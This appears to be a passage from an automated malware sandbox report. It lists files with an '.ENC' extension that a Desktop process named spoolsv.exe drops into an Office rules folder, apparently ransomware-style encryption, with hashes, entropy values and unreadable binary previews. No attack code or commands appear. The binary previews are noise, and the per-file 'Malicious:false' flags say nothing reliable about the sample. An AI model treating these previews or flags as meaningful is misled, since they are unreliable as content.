                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.j...4.......2..M......... ..1...L%[vj.D.pT..y.I.%.f........U.....D.".93.{.Q.-.~.f..y..w..Gp.....q.......<.... ...|._.i.k...C.I.}.k....p.xW.~..<..).b..|...v..?.kc.......N..[.s.........QAH}..b..U..L%O..n..N.l."..x..<.:C.1iM...o.<L.Y..x.X}\..O.....\.\..(....D+..$p.N...^...,....W}l.\K..c.fm...D+.2[m.~.N8..-'....!c;..Z..}q.%.NX....9.............O.LW$1-.&v...t.f.]....S.*..(........du.c...!'.|w9.q..j..H...E.k\mp...3.h.....N.G...TG..sX...2rR0.'Y.....s..M..G.)..wH.Di../......kW.-aE.I...$..($^1.6.&.D.U...{k...._..G{n..}.$..*.`Q.V..|x(...V..>...GN....g.q..7x.......M.d....b.Ds...z..O.;..[X..x.R.......1..... M...a.B...2A9u9....;.qR.Z.Nj.6.:...l..Z|..)v...\.(....7a.>6.{.Br...57..c...yfcz...5`.&K$...'.$.~G(.............M6.Nt.%z..S..f...Sg.O....i......^+R..C.'...uB..9.Q[H.a.....!_[._.~...k...L.[..i.7.e.p..;b"..).].yu.Ey9......oD..S..2...S.DyR.U..e...w)........x..a.<.v......A.rZ.=.....T.p.....]x1.e_7..OZ.Ka..J$H

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11792v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):7024
                                                                                                                                                                                                                                                      Entropy (8bit):7.971033197736095
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:++mWAIFpR/+kHOnShEv0bU7MRBTlvkA+HCK+m:S8f+k0MRRxkR
                                                                                                                                                                                                                                                      MD5:2EB9B74D8B039FE62C46983B56FE1ED0
                                                                                                                                                                                                                                                      SHA1:43F9C1A95F250843DC85962983DD34059DE7E270
                                                                                                                                                                                                                                                      SHA-256:3522C28E9A985FF6944DF8E4514890B856AE0EE9DD92492AEFB0A21DF427D0B1
                                                                                                                                                                                                                                                      SHA-512:D86A1E7DA4E85FF7240B815977A6BB245875D2FDF91E016D477DD008A124FEEA7E32D93DCD5EA69AA99ACB63D3044883B2C01724ECABD50BDD7390BDFC07724B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.r..P...?......#..}v..6..!.t.<..q.L...~.\....E7..r..kz*7U...$u.c.5). F.B..F0uW.a....y...>..1U..pY.>C...{..q]s....C..E...t...N]....a.a..>...g.........Cz...{.....V.i..M....!...B...`.vR.s..../.E......90^.s......I....;.......l.........'.v._.LV.xi*....k.. 1..s..UN8Z.....H......Q.......!.8q.o..6'..E.{@=....M..R.x.u..._.....B.*.b.Z....&.......Q..lz_.C...S.)..WQie.....`.Q.......?".......T......^...t....a"..p.}..pVs.3...DJ..C.%....w3.{...X.#.8...3+5$.^...f..$E.Y/Y..:z..A.Y..Pl..)...5n....Yx...?.".{..dh..bug..k......K.m.~.... ..r.)8..y.O.G..(.a..N.U.Fl'W........T.4..ok.p.T.P...i.0*...a.d}8.!80.....j.?..UD...V....S.../.U7..C..4..#F....Q.vv.....Q.F....=b.....2.C.}X.....u..J..$.....8.5..B.W..z..,e....(...J.<7...e=U.Gb...*[......2${QA.UY.e7....a..<.......L./...s..w..........N.t.....OZ6..b^Y0o..>.J.tW...IJ9a.'......U.I...%`.u$=...:.3.r..'.).."....}..H ..h.24....^zTJ....v.V^'.]t...m....Ho/qE......5F:..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11793v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1232
                                                                                                                                                                                                                                                      Entropy (8bit):7.857743716956132
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++BZmc/EUHD4daDrQ8o3eLXFd8KckG+rBdIhW+5UWxF5RhX:++t8UHD4IDrQDOXiIbIhrUWxthX
                                                                                                                                                                                                                                                      MD5:3393AE2FD888104CCC4C498B0B73D1BE
                                                                                                                                                                                                                                                      SHA1:316430B1C6173A3739451488D369A0F5AAC9C5C4
                                                                                                                                                                                                                                                      SHA-256:228307105CA912D44544B2696135FEF64BCEC48479B29383798BC1397D5915A0
                                                                                                                                                                                                                                                      SHA-512:FF593E0D06AA3D894AC5701FB5ED0C1BA476F6A518196949D51A3EC8BE1C9706F185FD48AE64AFF19167C5EE98A857B7A64FB502819CCD0749341A90DD345AE7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..J.Ir..Y..b-p.ut....c[.}-..X.....$Dh...H....'2Ad.U>.Cx.w3.N^...g..#?Yc.90..f..V..!..o..5..v&&oVf@...C[..E..../.........|.9..... .@..8..X.._.....:WMG..<.~....7t.$.............Kel.....I.V..1....>ZU.+.i..:SP."..d....0....V....*....i.G:....J.".kQ.......BnF.'N5...8".0...g.!^..@....(.R.#~0.f.6sL8.++...[.....@......|Do....JOU.s:!sKg^6..d..k.....P...c....F...6|.-..O...{.....`X5..h..r..@VjO...._.=....E.o....X..E.]..vH.".T1=.......WO`||...$...^\,.}sPh.#i.S...cnI......w...Y..E..$..s....+#._1...h..\c..vH..FW..,`8&R..,.%H"..F./....j...h.q.E...8.&...i..e...)...K=y.4.+....C..\p..V$y.._6.../9.......z.=."#.c....OY...).V..+;..L.Jj,...4..9..8.T.D....1B.nP.8W......9.*..4...a...w.W..GO..a..j...;.>.....H(-Ps@....Trh.......3...0c.)..^.....j3B...L...A....D...~..}U..H...w&*...wB.......=.>=H1.GtI.RB~..J}..v....Tr..;.'a...dx8...W`........W&#..z..&.<...}B....GY...}..........)rG.S..uI.(...a...j.8.u.|....yW>....2$.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11794v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.856744837367359
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++jRcGxMUGfcxVgYCLCIRIkzOQL1llOTnegEswJ7c+5vUkZkfPUz5l:++tTaoVgyIRXOQzfph7c+5KfPSf
                                                                                                                                                                                                                                                      MD5:6CEF267E4E255F576E0D74C6140F43C4
                                                                                                                                                                                                                                                      SHA1:8ACE76C8896B664795B302C7A9BA534D92839541
                                                                                                                                                                                                                                                      SHA-256:2FB4B16A6BC4645B2F98B32AF803F1298DA4093F28B6E899E2A1FDFA92F83ACB
                                                                                                                                                                                                                                                      SHA-512:DE00B4812C583FE10FED6FAF8725951AE479CB26568B6221E146652E7D613A4E082971011B13BE5032A2D840983C3005479429C0A1287BCD3DEB6E05B0CBAE98
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.../...C.3.9...%..B....K.r.wc.G..%...{..{-.|y.<3Z1.b......q.3......(z.(.N.r3..UM..!3.... ..t.......aG.oP..G.....hL.z.....#....b.(.J..!.Y.I..Y2N.uH9.."......V..W..j.L...T...Jn\.:.,.HH1...#.-.=d=......I.....p...t.`<%.RT'I.W...,1..HJ..]...AC......?&...^I....e....,....>.5.....}jVN....wA6....l../L...OP]N..{68K...].+...!..2..F.. ....o.?4....'..A..G.u....5#J.=)..K!-*..._.@.......Uu...H2-..ra....[.I\.....T.|..]...._4.gU..7._K....b...x\s$..|.*.../...%..).t.0}.@.8..Ae./W.....X......e...8>.ymn[.......Cn-]...En..C....^.......J...W3.(....-}y..G.0...m..9.f...!,G....um./zX...(....2..b/..XL.......^..Y.....L..f...-.JE..+....8..._r.jp&.u.z..B3...w6./} .(.b...N...V.~Z2...........$..3u.....>Z..8M.M:?.9Y..Cd{?.i2....cj DM).;..O7.."..}.u....{J?.,(v...o.k....1._.1-.,.T.r.R....*..h..;.r...H_>gK>.>..!&...I..Q...W5.(C..c~.K.=aa...D*...-?.......+S.I.4z....|.1.......#...+M.........(.&...{.Rh.=....Q.h......x.@.:/mlY.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11834v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.858900418625183
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++5LgApr0QVPG2qld3Jdf9TSlaVsBo3TzS9PdbVjuUTD0XNo1Ub:++5LgE8LDTzy1bVjuuDAoS
                                                                                                                                                                                                                                                      MD5:2DF094DDFA0A6A40EDD10B77AA278BF1
                                                                                                                                                                                                                                                      SHA1:14CE5BB5952CB6D4F15D12CB44CB289DF1BE7ADD
                                                                                                                                                                                                                                                      SHA-256:CC9AB6DFACB626D983F5810C7153EF342458A23C22B26711C3A2FC8CD4CD6738
                                                                                                                                                                                                                                                      SHA-512:8291438A026AA0D3BDE0AB74752A309E6D7F7DEF3766DF77A678EE709046532AD99FA8E7F7EC7DA1633C20B41D3031AD5909A6823B29CF891C8A0C03B543F8A6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f...`...XT...H.O.T-.....'Q....'...hC.EK....-{....dc.b...%..I......L..,../Up@.0w.@..H......-n|..#}..z....w.l?z.}.f.5..M..y[...._..n%.Aq...s..z.MH2...?.fP.}......bf.........D.Z..m.Y..Sv!..,...C..-.M-..F..khS.d......./...J.f..5h...0".U..s.#c%^%.M_s...P..(. .T..oOG-.h..@v.:.FQ....AZ.u..]z....E.~A...'.....w.mh..:$P...U.YR.f..x_~3.....4.w.e..K%...l{.i......)......I.........l.2.s..#....-3..+...Z...c>.>.wUK'..Pv..T.^p.b(o... ..R.l...{/..b4......!..(*Ui.X..obN.^.r.+IA...Q"N....=..........O..P{c...z#..L.E.Bs..A.Aq.Z..c.W.P.....{...}&.J.K..6.]..DM."....I"..kX-0J.r 8.`.;.....b.c*.,2....l..%+.l\..V..H......y..j.y...Y..1F.]...l.....!mL...7..).|:..G..*.....;d9Lt.j6..\....)|......eQC....S..^.-...3...cE(.oP9d-..JO4. .....A.....0z...5K4...o.zO.I.4.8.G|j..l.F...3...^.].w..1C..(...Xv._..o......jF8|:.d..o.DK..;...0.W.<h........>.}|.1h..Yh.;f..~ ..1f..Gp..|.*.|.....S.}2wHt..hr.n.Y1..}.K^;9.g.{.%.C.E....R.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11882v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1120
                                                                                                                                                                                                                                                      Entropy (8bit):7.840862185556035
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++UFIz3DADKF91179HbrduIjX/w/r+AvExpJPe6uwZgkvwe2j2pTN:++Ki3MDm11lXjX/w/rdEDI+7ij8
                                                                                                                                                                                                                                                      MD5:11E527B2AE9D6AE0159E799AB54B8FE7
                                                                                                                                                                                                                                                      SHA1:5D9392A313F8DBA7AB4C35BF6856AFA437DE3242
                                                                                                                                                                                                                                                      SHA-256:856729483424FDFF3FC16456A224F02BDB03201F8217FA6E0AFBEBD6C14FA635
                                                                                                                                                                                                                                                      SHA-512:9552ED29D559C52C37342DEBF8631C2A4A2289023DEDCE8C30416F4D098BA1402E9C7DBBCC1AC26EFC8286E1492BEEEB2CDCFCAADBF9C1B29293E92AC1707775
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fg.u... o......:`.rc\...._.p{HB.T..T....RSI..:7:;..P.L.......f.nh......pb[#........C.D.........t..m.(tg...2-B......M..L.TjjG3.....k[..&......3.+..E1......~rI.}k$..i[H.4x)...Q.N..DP.q...q.1#g..D/....e...&O........u)S@.?u..9..#...EklY[|..lya....E.=.m.....o8.-.e,.\....1b.!..)k.2..a..%...P."..M..&,Q&`.+....vy....3.k...p...K.....C......M.KHI...5.Jyg.\.Zs.QV('..fU~N.|.z."..n....D...0.P....G....D..6..,L.oVE...T...}C.L..%.....s......1..Z4 Z. .gu~n...#0...Y.y5.^.C..R....q3kw]q...`.{..h.#&..:..c..5.z..L.Gv5.....yj]....l.w?...J@p0l.h+.~...c.K.H.F....1m...v..=V..:\.}#c....$.v..FY.mO..s|...._.{....<...X.4Y.=^....<...RM..;....Z..-..X^....a..<..X.Q......l=...jj..`.D....}+...........g..H.i.gf..y.Q@\*.~%.o....@.&...}:..U.V...La1U.Q...c>h.@.X<...fR.d..?v..kJ4.e.b...."....O..G.._.z.7..:/HE......G...4 h...DZ_*5...................gz.....P...R*..^t....7..K../..j.....A?o........Q..$.'L=..Q.|..n.P3...6....?..RL:.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11890v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1088
                                                                                                                                                                                                                                                      Entropy (8bit):7.810526591843757
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++LBoQPf6nq+6QlM2M/Cokb7MHe9GSnYt7IMOdZvW:++uQPoH6D2gCL9lMG+
                                                                                                                                                                                                                                                      MD5:3A78C61F65C18F345A348119FBB4F7C2
                                                                                                                                                                                                                                                      SHA1:0F8F7F8D91C0AF069E7C7517E81296040B582B84
                                                                                                                                                                                                                                                      SHA-256:5BAD80125A3008CC475365291E4C1E105DF5810AD65BB434084DD42089A9B850
                                                                                                                                                                                                                                                      SHA-512:910E218F1CE6B9952599DC6E953746D5775DE48ECFED70BE162ECA9400C6EE3D4ACDAF0B52A14167493AA43E270ABCC8845D63FCF519291A95C8A4AB4B545C25
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.L..">qT....\..... S.l,.s..Z..|9c./....y..H..o/.@.t.........M.t..~z]...}..i6=..>b.[m..Mp7....k....NN.?._.|..H./)F.p.@..QK-..$^h...q..iC.w....@.......;q..@#...W.]...s.K....l.{$%...Q0.p...B.....u... .Rts-....c.f..C..8..O.N4t..9.0..v\#fu{Y...F. .z..].Q..En....F.U......@......D.?.I@-..]?..#....<$)...G.4....pn..t.'...<NXC.....V.......<..^KX/.....y:..`..T;.F.5.mQC6r......)j<...MJ...,P.+..^3....8 .3.n.Y....b..ep..KX.u..e.....+9.a.........W.B..kA.}c...O.}W$.Mr.=p}...=...v...W.M.&.:@D..12.nB.~U..y.2QJ...CyR=...-h.9..[..1../....I...wt...N2....5_..Us.}.E.@..5..+8}......~.{...A....{.C.eL..1......L.d.@.OP....I...|d....@nJ..>..N.T2...Eq.NAuaRL .9.[$.....S.U5..].r..b...,&.f...j.=..i.)4..U5......'d..N.U..5>.1..........q...".K.[eq^Dm$..K-8."...1...+.g...-....?.9...|..(...z.....C@.NY.4.R.r.v..s.;.x..v......5%...yV....8z..'O.b..^.|...f.u.z.=.h.nv..m.p...1.q.W...* ...@.w.^.k(.o...(r.v.....e*U..'

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11930v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1216
                                                                                                                                                                                                                                                      Entropy (8bit):7.847381941268686
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++DlwysiaNhjNOXU9pcjBHggv2/RWdCyq7n1JeG2s2AHoWLNkNSafm:++5wyslNOXlg2mACyqDVTH3ide
                                                                                                                                                                                                                                                      MD5:ACB63C65D668AE5E77B753EB3AF8F025
                                                                                                                                                                                                                                                      SHA1:1CB54C838A29555D0BBA753F7E8CB0EAE12C05E7
                                                                                                                                                                                                                                                      SHA-256:648DCD39248B7CD7E69F40188EA538F501A04651C8A6C48FB6160BF1D8BFEA45
                                                                                                                                                                                                                                                      SHA-512:7EEA5FEE6212B07AA582C50633A33F4E304D467708ABFA3C264CE7BBB44DEEB61476D9B9CD32A932BB9E35CC1012D87FCC9E65E7F944059A3BA4E785582A3383
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..gN......K.m.Y,?...x].(Z....>...We.K:..Dt.....m?.^.4.^.V..}5.C...LU..S.t."...R..7......p..4x3R...Wv~b...V...gu..b,......#.....x...!......@.....@.K0.._..X~........O...d...`.a........e......$`\.).?.f.o...}..Eom...P.YMq..).. Q.f}l].........W.....k2..,Mo....\...=/.`/Z.v.yP6|...7..Z..r..O.`.. ...D..[s.Z..V.....@..zk.n.....F.q..2..i....6..g).'F.....U...?a..L.f8.Ef.....{..p.....W.R?|W....~p..&..D.!.)V.O.....>V.....>;...I.Qj..@I..`......O(..HS......7..N.}..-.lj>+..o............yZ.A$....6.7...U.2. ...I.:.....X......]}..C<1.t..!.tmx...tl.[^..Dx..v~.:.hD|...._.q.....@A$.LR.....o......l.p...F~l.f.FA.O.AcX.4C..0.....e.._..].....B..#sY2r.-F..Nx....k=............$^e..._......R.sBCzZ....F...-z..]p.....cq...}.....Wp...E-.Vg.^...3../.mz....!.v..p.j...dE,..Ex..h.Q.F...l.|..[..o......t/D.oia..C...I.#~%B.PC.....g{...ke...<..j.^.....Hcr..;.....OW.p.0!v.;.h.0..r..W..a..^...`..xt..A.%.74qHD_.3.9..PP......K.C..M.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11931v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):576
                                                                                                                                                                                                                                                      Entropy (8bit):7.620211863643689
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7HWnTMIC/drdaiAs/QhDCftAl2UJwzDlUDwFmdMa1J8ZBKmhv2XP7u3M:++r5IC/VdT1LieGEFod1J8/KmheK3M
                                                                                                                                                                                                                                                      MD5:DE36D5F998D176FE0DF3F431698BBAA3
                                                                                                                                                                                                                                                      SHA1:B31428561D5E81B56C1BAF8F3F1D5896E6B3E887
                                                                                                                                                                                                                                                      SHA-256:5FDF444083EAAAC993164B921F5B90F095311A7C5A0568A43E050E28286F71EC
                                                                                                                                                                                                                                                      SHA-512:262191D66DAF553C6FC7B5FBF270D791B5CD1041DA970E9B2F19D4AF3DD99AFF853FCB0BBA505EE8B080F82409EB8CD401D6EB96DA454C9CFDF8F7D52320264C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f...S...;.:........<.......3...v..Q...u..B........&......-....p(.r.:^q#.N.@.Q.Bxs....D.N5]....."L..6.._.~.]..oF...}....*...Pp.`.........I2'.1...P0u....L......w2...wpq...........3..*..~.6....fb.sI{.;.....L..2....y..f....A..T..Q....g."...K....Z.U..c...g9..o..I......5..:..L.{.....y..k.}.i~...5.r.9.....g..N....;.m....._4.%pE.e$...........6.....N_5&/B.:_0.;.."^D...A~....gc3..!b..........S\X..g~.......I......y...f.......(.F|=Tb....R...0...o.Hh......i^...$..YN.../1\Y%..l...3.7l...K.R+.....Q...T. zr...a

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11932v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3248
                                                                                                                                                                                                                                                      Entropy (8bit):7.9451280914238245
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:++oQqMcyARmR+9v4B+1s/CGwfS/3A4pMX:++VbcyARmR1B+1+CGNvEX
                                                                                                                                                                                                                                                      MD5:A283EB1F7E6D8CAD1C36E0FA31C64715
                                                                                                                                                                                                                                                      SHA1:65914637BC4A26656B775D234085DF001CE1AF2D
                                                                                                                                                                                                                                                      SHA-256:F053699A084161F61EA460DE83CD21172C7C514848A49FF4B0BBA1C47C25672D
                                                                                                                                                                                                                                                      SHA-512:1B8096B4B0D464F281CACDB1C98180C6527265ABD454B0C46D2DCE30E7FE323A7B7D3F08B518E1DAE0C31198A921587178CB8F63818AFB1CE464C7D97B3C93E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.D..S..r$CT....U....`.u...m.H....bk...>....-.N..S..G.GruOd..l....i.k...N.4....:..@iW...A.u.n.@..]!....0b1. ...n9...X...er....S1....h.....+......k~..V..U..0^..0A.){9s%`.....A=....c.^...I.3.cOn.....]=e._....(P.\cb|r..Rix...v..BP...).*&:..G....#...7.hv......L.{....J..9."#i.j.9.j;L....\u.....?.-8>.....D..c.t~nz..}*P.*...@@..?rJ"..*.R....H.E?E.W.8.YW....+..1.0...w.@..lm......@.}h..f.Uf2....9{...*26pe}...I=.....;.._aOl..X....]..e$L... .....@..'.....O_...8).F:....l.^ .S3<..dx.M*.....~.a>...`..0..7..g..=.q..).R..N.....M.......tu.y9l.......:Y...1....nLH}...R.u..<...=.w..Z.....l....~.7...k.......8.8...j..`.#....w0....`~o$=8..x..+.GE....U...q.~.W...$.J`...~.h....nf..2St.....E....6...?..0bv.U..t..F4mt.q.4f.d.\i....L..."\......>W..0_WL@iy..k...0.Z..S.....D..z.$[.w}..p.%.\.=.f..$..*......P5../B{+...H:.S..3AU.c..U.a......4.K...GKW.(....%#....B~..'.Mn......f:4.._..E.NR...c....Jy.$~.-

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11933v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3344
                                                                                                                                                                                                                                                      Entropy (8bit):7.9405521129487004
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++cHjPDgngAcXeqjPwmqolILXC3Ggb0P9WYYvgd0sI0BBvBXnA0gQIKGbxLWv7Q5:++Y7W6lIP11YYdXzNd01SELDr9
                                                                                                                                                                                                                                                      MD5:E4538C7E68A5F9193E26F7EE733ED677
                                                                                                                                                                                                                                                      SHA1:154468199A20642615B8D267BE617D87C8A53487
                                                                                                                                                                                                                                                      SHA-256:5C797A10A57FC092809244DCBA765F633DC09F14BDA0A1265A0D236084313C49
                                                                                                                                                                                                                                                      SHA-512:21DB8B1D5406159C5187C33039DC53FACA2FB0E468A836866E40F023CC0C3F9C1D4100D3C6F293FAB6519ACAD365FB15EFD0C281758D7209390AC0491C9A25C0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.8d............<`...d....+p.I...L+G.iW...fP}....H....'s.J.....Y.T........g../.Zr./...b.w..r;..r..0*\...mS`..j..=gN....&.p..."..x8 ..U..`./.;.........;.G.K.<..B...T../w.'..FJY...h%.a.....8...7........i....Bz.|.......N.Uo..6I;.x..........m........In.....v..........9.. U.zu.\.^.z......8.....o.H(~..j....!.[..7...m...d.&.J..i.)...N`>D..g.%..(..>.....I...\.....l.s...v.......;.....6.7{.....=4....|...'0).17.b......P:.W.%..U.]H...Q./Mq1.......~..d..../...p....h...G%..wTL.X'.R..(.b.a4..0.N....8.L..M......j.2q.q..Zhb22.!t.m...*d......xe.2.M....s[5B..A7?.".:.w!.:...0.s....^z....2.....o....G.P6.$..}k.........(I.....L..%.&.J...`.o.'.AC...(.?.[.G. .$.&........I.&.........V...:p.>.S>.X.NH.+^b...,g...}..z..;.'B......qE..p(..:'P..>..7..>u..v*E..H.-.V.+Y....%.9].r.....v#.ff$.....'.`.<.^.p.....N.blIA..n.).yH...MN.j..Y.r./ot.=.d....7I...@.B..3.....g.D...=.>0..HF.......=....E..T.....t......TV.?..o...y}..F;..!}..=

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11939v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.486990937114167
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7vszrpDCnQnhD9QePZYnbDK00S52xnOaBJs:++TszrZ9hDa9iw52HBJs
                                                                                                                                                                                                                                                      MD5:09C699269E8DC70BCE19BF3F11E7D6F8
                                                                                                                                                                                                                                                      SHA1:FB1025F86E992D5197B702C88D298274BF086B90
                                                                                                                                                                                                                                                      SHA-256:54BB0D5D2C867CE4BB9B6253A69FA38FDB06497553597D358F42A3B43BE3B0A3
                                                                                                                                                                                                                                                      SHA-512:89553C00175433DE90DFB3BF1FE97924A1860B22965B0F6CF09FF2AC6595D3B205AB29358D2CD15B1E3275B6F4E4517F015B8F63B6DFC5A9F19D7D2D6E4416CC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.%...&..#.>&.I$I..m....~..w&r)C!.h..f......N..{...t.0......DP...){...Yx..f'...".>..5 .U.....3.c....$.g.d....(jqU7.y.[.Ct..y...C.$o.....9W~fW.l..J..yGV]..WWb...7Dq Z._.O...V.......M.RV..&.I..q.A.!.d.....b..%.l.G..e......da....X.y.R.O.~..\X.h...l..x2"..F.....|..e.pY...l..V.e3^+.oC.H.V....H..E+4S(..'o.Qh.V.....i.B.b&..Y..sh....H.l...=..MI....j..I

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11950v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1296
                                                                                                                                                                                                                                                      Entropy (8bit):7.8739775646963315
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++ltRvzjyJPX7b1sagB3OeRQK8G9r66wmxsBRo4R2UpdF2ZFfrm9/LVlf:++ltRvzuZ10LmIJCxPLF2n6JL3
                                                                                                                                                                                                                                                      MD5:1D33FF6EA53F220D52A2C8B33575AE1E
                                                                                                                                                                                                                                                      SHA1:0CD8FFE9D4AB5ED3F587862738267A09234182EB
                                                                                                                                                                                                                                                      SHA-256:2922FC5E06CACB6839E07F1BEE61D6128576CEF5192ABF1FDF2CC45872417CC6
                                                                                                                                                                                                                                                      SHA-512:3156EF3937FE962E11C0973497D355013FFA346D96962ED778575D6558DA4F991DE96D1CF7B730D2FBBB821537DCCFCE9E25710DF78B65E119A332F178BCAE2E
                                                                                                                                                                                                                                                      Malicious:false
